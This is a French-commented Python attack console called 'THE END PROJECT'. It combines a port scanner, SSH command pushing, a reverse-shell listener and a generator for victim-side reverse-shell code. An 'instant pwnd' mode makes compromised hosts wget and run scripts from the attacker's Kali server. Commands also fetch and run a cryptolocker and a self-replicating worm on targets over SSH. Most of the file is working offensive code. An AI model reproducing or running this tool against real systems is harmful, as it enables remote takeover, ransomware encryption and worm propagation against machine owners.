import textwrap tep = textwrap.dedent("""\ ####################################################################################### ############################# THE END PROJECT V.0.5.1 ############################# ####################################################################################### by ben4444 # # # Objectif : # # - Scan ports/vuln # # - Teste vuln # # - Exploit # # - Persistances # # - Scripting automatisé de Scan ports/vuln Test Exploit + Persistance # # - Faire le café ! # # # # A faire : # # - script best tools (msf/nmap/smbap ...) # # # ####################################################################################### Tape "help" pour connaitre la liste des commandes ! """) ####################################################################################### #################################### MODULES ###################################### ####################################################################################### import cmd from doctest import BLANKLINE_MARKER from importlib.resources import path from random import random from cryptography.fernet import Fernet from sys import modules, stdout, exit from time import time import os import glob import socket import subprocess import socket import time from termcolor import colored as color ####################################################################################### #################################### FONCTIONS #################################### ####################################################################################### # Fonctions push FILE def push(exploit_path,user,rhost,chemin): try : os.system("scp {} {}@{}:{}".format(exploit_path,user,rhost,chemin)) except KeyboardInterrupt: print("") pass # push cmd on RHOST : def drop_cmd(user,rhost,command): try : os.system("ssh {}@{} {}".format(user,rhost,command)) except KeyboardInterrupt: print("") pass # Fonctions Scan def get_scan(rhost): try : start = time.process_time() for p in range(1,1000): try : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((rhost, p)) s.send(b'Hello\n') data = s.recv(1024) s.close() result = s.connect_ex((rhost, p)) if result == 9: log3 = "[LOG 3] - Le port {} est ouver sur l'adresse ip : {} !\nCe port correspond au protocol {}".format(p, rhost, data[10]) print(color(log3,'yellow')) except : continue end = time.process_time() final_time = (end - start) log4 = "[LOG 4] - le temps d'execution du scan est de {} secondes".format(final_time) print(color(log4,'yellow')) except KeyboardInterrupt: print("") pass # fonction handler + reverse shell def handler(lhost,lport,command): try : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((lhost, lport)) s.listen(2) conn, addr = s.accept() log = "[LOG 2] - New connection from : {}".format(addr[0]) print(color(log,'yellow')) data = conn.recv(2048) print(data.decode()) #reverse shell command send while command != "exit" : command = input("remote shell # ") if command != "" : conn.send(command.encode()) data = conn.recv(2048) print(data.decode()) s.close conn.close except KeyboardInterrupt: s.close conn.close print("") pass except : s.close conn.close print("error") pass # fonction handler + telecharge un script e l'execute def auto_handler(lhost,lport,ip_kali,tools): try : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((lhost, lport)) s.listen(2) conn, addr = s.accept() log = "[LOG 2] - New connection from : {}".format(addr[0]) print(color(log,'yellow')) data = conn.recv(2048) print(data.decode()) #set command action # command_list est la liste des commande a effectuer, il telecharge un script et l'execute # modifier le script pwnd.bash pour faire les actions voulu url = "http://{}/tools/{}".format(ip_kali,tools) if tools[-1] == "y": #si le malware est un python command_list = ["wget {}".format(url),"python3 {}".format(tools)] if tools[-1] == "h": #si le malware est un bash command_list = ["wget {}".format(url),"bash {}".format(tools)] for command in command_list : print(command) conn.send(command.encode()) data = conn.recv(2048) print(data.decode()) s.close conn.close except KeyboardInterrupt: s.close conn.close print("") pass except : s.close conn.close print("error") pass #code victime reverse def get_reverse(rhost,rport): reverse_code = textwrap.dedent("""\ # Code Victime du reverse shell import socket import subprocess s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True : try : #@ip kali et port handler i = s.connect(('{}', {})) s.send(b'Shell connected : ') command = "." while command != "exit": if command != "" : data = s.recv(2048) command = data.decode() #reverse shell process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) out = process.stdout.read() + process.stderr.read() s.send(out) s.close() except : continue """.format(rhost,rport)) return reverse_code #fonction variable = input() colored def set_rhost(): try : rhost = input(color("Set rhost : ",'blue')) return rhost except KeyboardInterrupt: print("") pass def set_rport(): try : rport = input(color("Set rport : ",'blue')) return rport except KeyboardInterrupt: print("") pass def set_lhost(): try : lhost = input(color("Set lhost : ",'blue')) return lhost except KeyboardInterrupt: print("") pass def set_lport(): try : lport = input(color("Set lport : ",'blue')) return lport except KeyboardInterrupt: print("") pass def set_command(): try : command = input(color("Set command : ",'blue')) return command except KeyboardInterrupt: print("") pass def set_user(): try : user = input(color("Set user : ",'blue')) return user except KeyboardInterrupt: print("") pass def set_ask(): try : ask = input(color("Set listenner ip :\ndefault = 0.0.0.0 ? Y/n : ",'blue')) return ask except KeyboardInterrupt: print("") pass def set_tools(): try : tools = input(color("Set tools name : ",'blue')) return tools except KeyboardInterrupt: print("") pass def set_ipkali(): try : ip_kali = input(color("Set @ip kali : ",'blue')) return ip_kali except KeyboardInterrupt: print("") pass #consol def set_i(): try : i = input(color(color("shell # ",'green'))) return i except KeyboardInterrupt: print("") pass #fonction ip kali def get_url(ip_kali,tools): try : url = "http://" + ip_kali + "/tools/{}".format(tools) return url except KeyboardInterrupt: print("") pass ####################################################################################### #################################### VARIABLES #################################### ####################################################################################### #var key = Fernet(b'jY-kUBkRn0DTi4BDHqcNJcke_GvHqa6OyZzPw6TFnh8=') module = ["cryptography"] #msg print color | [LOG] - yellow | [ERROR] - red start_handler = color("[LOG 1] - Start Handler ...","yellow") #log2 = msg return def handler #log3 = msg return get scan #log4 = msg return get scan time log5 = color("[LOG 5] - Reverse Shell Created in /var/www/html/tools","yellow") log6 = color("[LOG 6] - Reverse Shell Create : rhost/rport on targets = ip/port kali","yellow") err1 = color("[ERROR 1] - No port set","red") #err2 = color("[ERROR","red") #err3 = color("[ERROR","red") #err4 = color("[ERROR","red") #err5 = color("[ERROR","red") cmd_help = textwrap.dedent("""\ HELP - THE END ! command remote : - ssh command - execute une comamnde via ssh - ssh shell - execute /bin/bash a distance, donne un shell minimaliste ssh - pip install - install les modules du code via ssh - install python - install python via ssh (root required) - rm crypto - telecharge et execute un cryptolocker via ssh - rm decrypt - telecharge et execute le decrypt via ssh - rm downdd - telecharge et execute un vers autorepliquant a l'infini via ssh command local : - help - affiche le message d'aide pour commande - set ip kali / rhost / lhost / rport / lport - variables remote access - show options - montre les variables remote si dessus - scan - scan port victime ou réseau - reverse create - creation d'un reverse shell a executer sur la machine cible - shell - execute /bin/bash: - handler - met en ecoute l'ip et le port choisis et recupere un reverse shell - instant pwnd - recupere un reverse shell et push un script qui s'execute - coffee - make a coffee - edit tools - editer des fichier sur le apache local """) coffee = textwrap.dedent("""\ I'm a teepot but, i can make a coffee for you ! } { { { } } _..,}-{-,{._ .-;'-.,____,.-'; (( | | `)) ; ` \ / .-' `,.____.,' '-. ( '------' ) `-=..________..--' """) ####################################################################################### ####################################### CODE ###################################### ####################################################################################### #fonction du terminal principal def get_code(): i = "" user = "" rhost = "" lhost = "" rport = "" lport = "" ip_kali = "" while i != "exit" : i = set_i() if i == "help" : print(color(cmd_help,'green')) elif i == "set ip kali": ip_kali = set_ipkali() ; print("ip kali = {}".format(ip_kali)) elif i == "set rhost" : rhost = set_rhost() ; print("rhost = {}".format(rhost)) elif i == "set lhost": lhost = set_lhost() ; print("lhost = {}".format(lhost)) elif i == "set rport": rport = set_rport() ; print("rport = {}".format(rport)) elif i == "set lport": lport = set_lport() ; print("lport = {}".format(lport)) elif i == "set user": user = set_user() ; print("user = {}".format(user)) elif i == "show options": print("ip kali = {}".format(ip_kali)) ; print("rhost = {}".format(rhost)) ; print("lhost = {}".format(lhost)) ; print("rport = {}".format(rport)) ;print("lport = {}".format(lport)) ; print("user = {}".format(user)) elif i == "coffee" : print(color(coffee, 'red')) elif i == "edit tools": tools = set_tools() ; os.system("nano /var/www/html/tools/{}".format(tools)) elif i == "clear": os.system("clear") ; print(color(tep,'green')) elif i == "exit" : exit() elif i == "scan" : if rhost != "": get_scan(rhost) else : print("error : no rhost or network set") ; rhost = set_rhost() ; get_scan(rhost) elif i == "ssh command" : if rhost == "": rhost = set_rhost() if user == "": user = set_user() command = set_command() drop_cmd(user,rhost,command) elif i == "pip install" : if rhost == "": rhost = set_rhost() if user == "": user = set_user() #pour chaque module du code, envoyé une commande ssh pip install module for item in module : command = "pip install {}".format(item) drop_cmd(user,rhost,command) elif i == "install python" : if rhost == "": rhost = set_rhost() if user == "": user = set_user() command = "apt install python" drop_cmd(user,rhost,command) elif i == "ssh shell": if rhost == "": rhost = set_rhost() if user == "": user = set_user() command = "/bin/bash" print("Shell start :") drop_cmd(user,rhost,command) elif i == "shell": os.system("/bin/bash") elif i == "reverse create" : print(log6) rhost = set_rhost() rport = set_rport() reverse = get_reverse(rhost,rport) with open("/var/www/html/tools/rm_shell.py" , "w") as rv : rv.write(reverse) print(log5) elif i == "rm crypto" : if rhost == "": rhost = set_rhost() if user == "" : user = set_user() if ip_kali == "" : ip_kali = set_ipkali() tools = "crypto.py" url_crypto = get_url(ip_kali,tools) command = 'wget {}'.format(url_crypto) drop_cmd(user,rhost,command) command = 'python3 crypto.py' drop_cmd(user,rhost,command) elif i == "rm decrypt" : if rhost == "": rhost = set_rhost() if user == "" : user = set_user() if ip_kali == "" : ip_kali = set_ipkali() tools = "decrypt.py" url_decrypt = get_url(ip_kali,tools) command = 'wget {}'.format(url_decrypt) drop_cmd(user,rhost,command) command = 'python3 decrypt.py' drop_cmd(user,rhost,command) elif i == "rm downdd": if rhost == "": rhost = set_rhost() if user == "" : user = set_user() if ip_kali == "" : ip_kali = set_ipkali() tools = "downdd.py" url_downdd = get_url(ip_kali,tools) command = 'wget {}'.format(url_downdd) drop_cmd(user,rhost,command) command = 'python3 downdd.py' drop_cmd(user,rhost,command) elif i == "handler" : ask = set_ask() if ask == "y" or ask == "Y" or ask == "" : lhost = "0.0.0.0" else : lhost = set_lhost() if lport == "" : lport = set_lport() command = "." print(start_handler) handler(lhost,int(lport),command) elif i == "instant pwnd" : if ip_kali == "" : ip_kali = set_ipkali() ask = set_ask() if ask == "y" or ask == "Y" or ask == "" : lhost = "0.0.0.0" else : lhost = set_lhost() if lport == "" : lport = set_lport() tools = set_tools() print(start_handler) auto_handler(lhost,int(lport),ip_kali,tools) #code os.system("clear") print(color(tep,'green')) get_code()